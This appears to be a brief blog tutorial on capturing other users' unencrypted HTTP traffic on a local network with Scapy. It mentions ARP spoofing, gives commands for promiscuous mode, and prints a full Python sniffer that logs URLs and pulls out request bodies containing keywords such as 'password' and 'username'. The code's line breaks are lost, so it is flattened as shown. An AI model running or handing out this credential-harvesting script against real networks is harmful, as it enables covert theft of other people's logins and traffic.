There are always chances to get someone else’s unencrypted traffic especially in local network. We might use ARP-spoof, poisoning, gateway attack whatever, but Scapy is the one of great toot to check network environment.
Pres-requisite
$sudo apt-get install python-scapy python-pip
$pip install scapy_http
Enable Promiscuous mode on network interface
$sudo ifconfig interface(eth0 whatever) promisc
It is always best to try it on bridged network. To avoid interference, testing on local host machine would be the best practice.
import scapy.all as scapy from scapy_http import http import argparse def get_arguments(): parser = argparse.ArgumentParser() parser.add_argument("-i", "--interface", dest="interface", help="Interface name") options = parser.parse_args() return options def sniff_packet(interface): scapy.sniff(iface=interface, store=False, prn=process_packets) def get_url(packet): return packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path def get_credentials(packet): if packet.haslayer(scapy.Raw): load = packet[scapy.Raw].load keywords = ["login", "submission","challenge","password", "username", "user", "pass"] for keyword in keywords: if keyword in load: return load def process_packets(packet): if packet.haslayer(http.HTTPRequest): url = get_url(packet) print("[+] Http Request >> " + url) credentials = get_credentials(packet) if credentials: print("[+] Someone has submitted flag, interested? " + credentials + "\n\n") options = get_arguments() sniff_packet(options.interface)